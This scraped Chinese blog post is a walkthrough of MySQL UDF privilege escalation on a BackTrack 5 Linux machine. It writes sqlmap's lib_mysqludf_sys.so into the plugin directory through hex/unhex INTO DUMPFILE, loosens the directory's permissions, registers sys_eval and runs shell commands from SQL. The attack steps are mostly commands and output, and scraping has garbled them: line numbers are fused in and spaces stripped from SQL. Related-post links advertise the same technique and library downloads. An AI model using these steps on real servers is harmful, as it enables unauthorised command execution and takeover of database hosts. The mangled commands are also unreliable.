bt5 mysql字典_Linux UDF Mysql提权_MySQL

最新推荐文章于 2021-07-15 22:06:22 发布
最新推荐文章于 2021-07-15 22:06:22 发布
阅读量135 收藏
点赞数
文章标签: bt5 mysql字典
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31480911/article/details/113376764
版权

环境:

os:linux(bt5)

database:mysql

简述:

通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。

要求:

在mysql库下必须有func表,并且在skipgranttables开启的情况下,UDF会被禁止;

过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令

1,得到插件库路径?1234567mysql> show variableslike"%plugin%";

+---------------+-----------------------+| Variable_name | Value |

+---------------+-----------------------+| plugin_dir| /usr/lib/mysql/plugin |

+---------------+-----------------------+

1 rowinset(0.00 sec)

2,找对应操作系统的udf库文件

因为自己测试,看了下自己系统的版本,64位

root@bt:~# uname -a

Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可?123456root@bt:/pentest/database/sqlmap/udf/mysql# lslinuxwindows

root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls

root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# lslib_mysqludf_sys.so

3,利用udf库文件加载函数并执行命令

首先要得到udf库文件的十六进制格式,可在本地通过

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';

Query OK, 1 row affected (0.04 sec)

因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限

root@bt:~# chmod 777 /usr/lib/mysql/plugin

数据库中写入udf库到mysql库目录:

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';

Query OK, 1 row affected (0.04 sec)

查看下这个udf库所支持的函数?123456789101112131415161718192021222324252627282930313233343536373839404142root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so

w _Jv_RegisterClasses

A __bss_start

w __cxa_finalize

w __gmon_start__

A _edata

A _end

T _fini0000000000000ba0 T _init

U fgets

U fork

U free

U getenv000000000000101a T lib_mysqludf_sys_info0000000000000da4 T lib_mysqludf_sys_info_deinit

T lib_mysqludf_sys_info_init

U malloc

U mmap

U pclose

U popen

U realloc

U setenv

U strcpy

U strncpy0000000000000dac T sys_bineval0000000000000dab T sys_bineval_deinit0000000000000da8 T sys_bineval_init0000000000000e46 T sys_eval0000000000000da7 T sys_eval_deinit0000000000000f2e T sys_eval_init

T sys_exec0000000000000da6 T sys_exec_deinit0000000000000f57 T sys_exec_init00000000000010f7 T sys_get0000000000000da5 T sys_get_deinit0000000000000fea T sys_get_init000000000000107a T sys_set00000000000010e8 T sys_set_deinit0000000000000f80 T sys_set_init

U sysconf

U system

U waitpid

最后,加载函数并执行:?123456789101112131415161718mysql>createfunctionsys_evalreturnsstring soname"mysqludf.so";

Query OK, 0rowsaffected (0.14 sec)

mysql>selectsys_eval('whoami');

+--------------------+

| sys_eval('whoami') |

+--------------------+| mysql|

+--------------------+

1 rowinset(0.04 sec)

mysql>select*frommysql.func;

+----------+-----+-------------+----------+

|name | ret | dl| type |

+----------+-----+-------------+----------+

| sys_eval | 0 | mysqludf.so |function|

+----------+-----+-------------+----------+

1 rowinset

f68f2add0b68e4f9810432fce46917b7.png

相关标签:

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

学姐吖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 5.6 udf提权_MySQL udf提权
weixin_36433730的博客
01-19 363
本来从回来就打算开始写了,结果各种的事情,一直拖到了现在,趁十二点前赶紧完成一下这个的记录,这个是整个内网环境的第二部分,考的是MySQLudf提权,给的是root权限,使用社区已经公开了的方法进行getshell,然后就可以得到数据库的账号密码了,但是这里我设置了外连的IP限制,必须使用web服务器才可以连接数据库。0x01 UDFUDF(user defined function)用户自定义...
lib_mysqludf_sys 的win版本dll库
12-01
"lib_mysqludf_sys 的win版本dll库"这一标题明确指出,我们正在讨论的是一个专为Windows操作系统设计的动态链接库(Dynamic Link Library, DLL)文件,名为lib_mysqludf_sys。DLL是Windows系统中用于封装可重用代码...
MySQL 漏洞利用与提权
weixin_50464560的博客
07-15 2488
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安全以来就 MySQLUDF 提权、MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。权限获取数据库操作权限本文讲的是 MySQL 提权相关知识,但是提权之前得先拿到高权限的 MySQL 用户才可以,拿到 MySQL 的用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
BT5使用字典
06-24
BT5经典字典,包含数字已经英文字母等,较方便使用。
bt5 mysql root_MySQL_Linux利用UDF库实现Mysql提权,环境: os:linux(bt5)   database - phpStudy...
weixin_34835470的博客
02-04 124
Linux利用UDF库实现Mysql提权环境:os:linux(bt5)database:mysql简述:通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。要求:在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文...
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
MySQL UDF(User Defined Function)是MySQL数据库系统中的一种扩展机制,允许用户自定义函数以满足特定的计算或处理需求。这些自定义函数通常用C或C++编写,然后编译为动态链接库(DLL),供MySQL服务器调用。本...
lib_mysqludf_sys
12-22
MySQL系统命令UDF——lib_mysqludf_sys详解》 MySQL是一种广泛使用的开源关系型数据库管理系统,其功能强大,灵活性高。在实际应用中,有时我们需要执行一些操作系统级别的任务,如读取或写入文件、执行系统命令...
CentOS 7.5 64下编译好的lib_mysqludf_sys.so
10-12
CentOS 7.5 64位下编译好的lib_mysqludf_sys.so,源文件在https://download.csdn.net/download/shaynerain/10715798,我博客 中有介绍怎么用
bt5 mysql字典,backtrack5下载
weixin_39636057的博客
03-12 437
对于喜欢使用linux操作系统的盆友们来说,backtrack5将会是你们不错的选择,它完美支持Live CD和Live USB启动方式,可以让用户直接从移动介质启动该系统。有了BT5,您就不用担心网络无法进行访问,因为它可是拥有无线射频技术的硬件系统检测能力的哦!backtrack5,最简单,最使用。backtrack5功能:它修改WEP,WPA/WPA2加密方式的无线网络也不在话下,当然前提是...
bt5使用教程----主要是渗透方面
骑蜗牛散步的专栏
10-06 7268
喜欢渗透,今年8月才开始接触bt5。看到论坛上有很多帖子,但主要都是讲pj的。如果单单是pj,对于bt5真的是大才小用了。所以决定开个帖子讲讲bt5在渗透方面的应用。这个帖子的主要是根据教主的视频教程,《LiNUX--BT4hei客手册》整理,加以网上资料,也算是我个人的学习笔记了吧,有兴趣的童鞋可以和我一起走进bt5。 (ps:教主的视频教程地址:http://v.ku6.com/playli
Backtrack5 自带的字典文件路径
weixin_34331102的博客
12-28 523
Backtrack5 自带的字典文件路径: /pentest/passwords/wordlists/darckc0de.lst
bt5如何远程登录mysql,BT5之Metasploit[MSF]连接postgresql数据库
weixin_35775608的博客
03-12 121
1,先查看postgresql的端口,默认是自动开启的,端口7337 。[emailprotected]:~# netstat -tnpl |grep postgrestcp 0 0 127.0.0.1:7337 0.0.0.0:* LISTEN 1100/postgrestcp6 0 0 ::...
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长
08-12
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
SEQ投诉处理与VONR信令及特性介绍
08-12
SEQ平台5G分析模块介绍 投诉分析处理 VoNR信令及特性介绍
毕业设计php企业进销存管理系统-qkrp源码含文档工具包
最新发布
08-12
毕业设计php企业进销存管理系统-qkrp源码含文档工具包 php,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 类型管理 商品管理 库存查看 库存查看 入库查看 出库查看 用户管理 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
lib_mysqludf_sys.so 下载
10-01
对于下载 lib_mysqludf_sys.so,可以按照以下步骤进行: 1. 在互联网上搜索 "lib_mysqludf_sys.so",可以找到各种资源来源。确保选择具有良好声誉和可靠性的网站。 2. 在选择的网站上找到 lib_mysqludf_sys.so 的下载链接。 3. 点击链接开始下载。根据网站的要求,可能会要求进行验证或提供一些信息。 4. 选择下载的文件所在的目录。通常情况下,文件会保存在默认的下载文件夹中。如果需要选择其他目录,请根据系统提示进行操作。 5. 下载完成后,现在可以使用 lib_mysqludf_sys.so 文件了。根据需要,可以将其移动到 MySQL 插件目录中的正确位置。确保文件所属用户具有正确的权限,以便 MySQL 能够访问该文件。 总之,下载 lib_mysqludf_sys.so 的关键是在可靠的网站上找到文件,并按照系统要求将其保存在适当的位置。通过完成这些步骤,您就可以成功下载 lib_mysqludf_sys.so 并将其用于相应的操作中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值